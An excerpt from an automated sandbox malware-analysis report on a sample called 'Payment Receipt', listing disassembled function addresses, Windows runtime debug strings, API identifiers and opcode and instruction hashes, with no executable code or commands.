                                                                      • Opcode Fuzzy Hash: 2905ebc795567ab577073a88ce364ad14b4c7e0c7208a1d6eed577e5a7b97f20
                                                                      • Instruction Fuzzy Hash: 1721837AE0011AEBDB60DF79CC50ABF7BECAF54640F44011AEE05D7200E7309A118BA1
                                                                      Function 015CF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 016102E7
                                                                      • RTL: Re-Waiting, xrefs: 0161031E
                                                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 016102BD
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                      • API String ID: 0-2474120054
                                                                      • Opcode ID: 0f28f042852cd4302a4662dd521a550588369d1bb20ee0c3d5e97116fe120659
                                                                      • Instruction ID: 64febbf7df254bfb85ed83b33eea6c0f49853955504cc92aca84194f2cc415c5
                                                                      • Opcode Fuzzy Hash: 0f28f042852cd4302a4662dd521a550588369d1bb20ee0c3d5e97116fe120659
                                                                      • Instruction Fuzzy Hash: 81E1CE306047429FDB25CF68C884B6ABBE2BB84B14F144A5EF5A5CB3E1D774D885CB42
                                                                      Function 015DB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0161728C
                                                                      Strings
                                                                      • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01617294
                                                                      • RTL: Re-Waiting, xrefs: 016172C1
                                                                      • RTL: Resource at %p, xrefs: 016172A3
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                      • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                      • API String ID: 885266447-605551621
                                                                      • Opcode ID: 7a7ae82eff832ce83d77fe64e77a2e15cff419c62f3f541ee94ad7b67a8bd797
                                                                      • Instruction ID: 914b7eb546666c05b54a7c9063245dda64420d117e68e67eda51351d8d1a3491
                                                                      • Opcode Fuzzy Hash: 7a7ae82eff832ce83d77fe64e77a2e15cff419c62f3f541ee94ad7b67a8bd797
                                                                      • Instruction Fuzzy Hash: 0641D031600616ABD721DE29CC41FAAB7A6FF95710F14861DF955EB340DB21E8428BD1
                                                                      Function 01652300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID: ___swprintf_l
                                                                      • String ID: %%%u$]:%u
                                                                      • API String ID: 48624451-3050659472
                                                                      • Opcode ID: 638b12263eea15451a7ae2fd5ed56937fc31de904e378891779fe0fa9dca57eb
                                                                      • Instruction ID: 7227dc3ed0f7c235fcaaaf713d5b87da17d1a76bc6233c8913d78b874d4d7806
                                                                      • Opcode Fuzzy Hash: 638b12263eea15451a7ae2fd5ed56937fc31de904e378891779fe0fa9dca57eb
                                                                      • Instruction Fuzzy Hash: 0B318672A0021ADFDB60DF2DCC50BEE77F8FB44610F440599ED49E7241EB30AA598BA0
                                                                      Function 015A9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $$@
                                                                      • API String ID: 0-1194432280
                                                                      • Opcode ID: a79f6badd34e1708eb222fbc6d7d80865972df8e8e48415d7818b05a86daa212
                                                                      • Instruction ID: dd3dc1783d25360d4061558543ee3ed48abc0dbf094956145853f80ea9688a05
                                                                      • Opcode Fuzzy Hash: a79f6badd34e1708eb222fbc6d7d80865972df8e8e48415d7818b05a86daa212
                                                                      • Instruction Fuzzy Hash: C1811C71D4027A9BDB368F54CC54BEEB6B8BF48754F0045EAAA19B7280D7305E84CF64